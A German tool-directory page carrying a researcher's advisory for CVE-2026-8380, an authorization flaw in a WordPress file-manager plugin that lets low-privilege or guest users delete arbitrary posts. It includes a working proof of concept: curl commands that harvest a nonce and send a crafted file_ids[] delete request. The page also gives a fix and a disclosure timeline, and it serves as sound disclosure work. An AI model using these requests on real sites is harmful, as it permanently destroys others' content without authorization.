Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-8380 — CVE-2026-8380 | Kitploit
Tools/GitHubGitHub/tiagob0b/cve-2026-8380
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubtiagob0b/cve-2026-8380

CVE-2026-8380

CVE-2026-8380

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-8380

CVE-2026-8380 — Frontend File Manager <= 23.6 Beliebiges Löschen von Beiträgen

Überblick

Eine kritische Autorisierungsschwachstelle wurde im WordPress-Plugin Frontend File Manager (nmedia-user-file-uploader) identifiziert, das die Versionen <= 23.6 betrifft.

Die Schwachstelle erlaubt authentifizierten Benutzern mit niedrigen Berechtigungen, beliebige WordPress-Beiträge, Seiten, Anhänge und benutzerdefinierte Beitragstypen dauerhaft zu löschen, aufgrund einer unzureichenden Autorisierungsvalidierung im AJAX-Lösch-Endpunkt.

Wenn die Plugin-Option _allow_guest_upload=yes aktiviert ist, wird die Schwachstelle durch nicht authentifizierte Angreifer ausnutzbar.

  • CVE: CVE-2026-8380
  • Plugin: Frontend File Manager (nmedia-user-file-uploader)
  • Affected Versions: <= 23.6
  • Researcher: Tiago Ferreira
  • CWE: CWE-639 / CWE-862
  • Schwachstellentyp: Beliebiges Löschen von Beiträgen
  • WPScan: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

Zusammenfassung

Eine kritische Autorisierungsumgehungsschwachstelle wurde im Plugin entdeckt, die das willkürliche Löschen von WordPress-Inhalten durch eine Parameter-Mismatch-Validierung innerhalb der AJAX-Aktion wpfm_delete_file ermöglicht.

Die Schwachstelle wurde erfolgreich in einer kontrollierten Laborumgebung mit aktivem Proof-of-Concept-Exploit validiert.

Zusätzliche Sicherheitsschwächen wurden während der Forschung ebenfalls identifiziert:

  • CSRF in Metadatenaktualisierungs-Endpunkten ohne Nonce-Validierung
  • Umgehung der Erweiterungs-Zulassungsliste basierend nur auf der letzten Dateierweiterung
  • _allow_guest_upload deaktiviert Autorisierungsprüfungen in mehreren Endpunkten
  • Ratenbegrenzung basierend nur auf REMOTE_ADDR

Verwundbarer Endpunkt

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wpfm_delete_file

Betroffene Datei

root@kitploit:~
inc/files.php

Verwundbarer Codebereich

root@kitploit:~
// inc/files.php:691
if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
    wp_send_json_error(__("Sorry, not allowed", "wpfm"));
}

// inc/files.php:695
$file_ids = isset($_POST['file_ids']) && is_array($_POST['file_ids'])
            ? array_map('intval', $_POST['file_ids']) : [];

foreach ($file_ids as $file_id) {
    $file = new WPFM_File($file_id);

    wp_delete_post($file_id, $bypass_trash);
}

Grundursache

Die Autorisierungsprüfung validiert den Besitz mit dem singulären Parameter:

root@kitploit:~
$_POST['file_id']

Der tatsächliche Löschvorgang iteriert jedoch über einen anderen Parameter:

root@kitploit:~
$_POST['file_ids[]']

Aufgrund dieser Diskrepanz kann ein Angreifer:

  1. Einen legitimen eigenen Beitrag in file_id bereitstellen
  2. Beliebige Opfer-Beitrags-IDs in file_ids[] injizieren

Es existiert keine Validierung, um sicherzustellen:

  • Besitz jedes Elements in file_ids[]
  • erlaubter post_type
  • Beziehung zwischen file_id und file_ids[]

Infolgedessen kann beliebiger WordPress-Inhalt dauerhaft gelöscht werden.


Auswirkung

Ein authentifizierter Benutzer mit minimalen Berechtigungen kann dauerhaft löschen:

  • Beiträge
  • Seiten
  • Produkte
  • Anhänge
  • Benutzerdefinierte Beitragstypen
  • Plugin-spezifische Inhalte

Das Löschen wird durchgeführt mit:

root@kitploit:~
wp_delete_post($file_id, true);

Das bedeutet, der Inhalt wird dauerhaft ohne Papierkorb-Wiederherstellung entfernt.

Wenn _allow_guest_upload=yes aktiviert ist:

  • wird die Ausnutzung nicht authentifiziert
  • wird die Autor-Besitzprüfung vollständig übersprungen

Proof of Concept

Laborumgebung

  • Ziel: 192.168.1.1:8080
  • Angreifer-Rolle: Abonnent
  • Opfer-Rolle: Administrator

Angreifer-Konto

root@kitploit:~
wpfm_sub : Sub@Test123

Opfer-Beiträge

root@kitploit:~
Page ID: 60
Post ID: 61

Schritt 1 — Nonce abrufen

Der Angreifer besucht eine Seite, die den Shortcode enthält:

root@kitploit:~
[ffmwp]

Nonce extrahieren:

root@kitploit:~
curl -b sub_cookie http://target/wpfm-test/ | grep wpfm_ajax_nonce

Antwort:

root@kitploit:~
value="9c233d4720"

Schritt 2 — Beliebiges Löschen auslösen

root@kitploit:~
curl -b sub_cookie -X POST http://target/wp-admin/admin-ajax.php \
    --data 'action=wpfm_delete_file' \
    --data 'wpfm_ajax_nonce=9c233d4720' \
    --data 'file_id=57' \
    --data 'file_ids[]=60' \
    --data 'file_ids[]=61'

Erklärung

ParameterBeschreibung
file_id=57Eigener Beitrag des Abonnenten, der zur Umgehung der Autorisierung verwendet wird
file_ids[]=60Opfer-Administratorseite
file_ids[]=61Opfer-Administratorbeitrag

Erfolgreiche Antwort

root@kitploit:~
{
  "success": true,
  "data": {
    "message": "2 files, directories are removed inside SUB-OWNED"
  }
}

Überprüfung

root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/pages/60
root@kitploit:~
404
root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/posts/61
root@kitploit:~
404

Schweregrad

Authentifiziertes Szenario

CVSS 3.1

root@kitploit:~
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Gast-Upload aktiviertes Szenario

CVSS 3.1

root@kitploit:~
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE-Klassifizierung

  • CWE-639 — Autorisierungsumgehung durch benutzergesteuerten Schlüssel
  • CWE-862 — Fehlende Autorisierung

Empfohlene Behebung

Validieren Sie Besitz und Beitragstyp für jeden Eintrag in file_ids[].

Beispiel für eine sichere Implementierung:

root@kitploit:~
foreach ($file_ids as $fid) {

    if ( ! wpfm_is_current_user_post_author($fid) ) {
        wp_send_json_error(...);
    }

    if ( get_post_type($fid) !== 'wpfm-files' ) {
        wp_send_json_error(...);
    }
}

Zeitleiste

EreignisDatum
Schwachstelle entdeckt2026-05-28
Anbieter kontaktiert2026-05-28
WPScan veröffentlicht2026-06-04
Öffentliche Offenlegung2026-06-18

Referenzen

  • WPScan Advisory: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-8380


Haftungsausschluss

Diese Forschung wurde in einer kontrollierten Laborumgebung ausschließlich zu Bildungs- und Sicherheitsforschungszwecken durchgeführt.

Testen Sie keine Systeme ohne entsprechende Autorisierung.

Tool herunterladen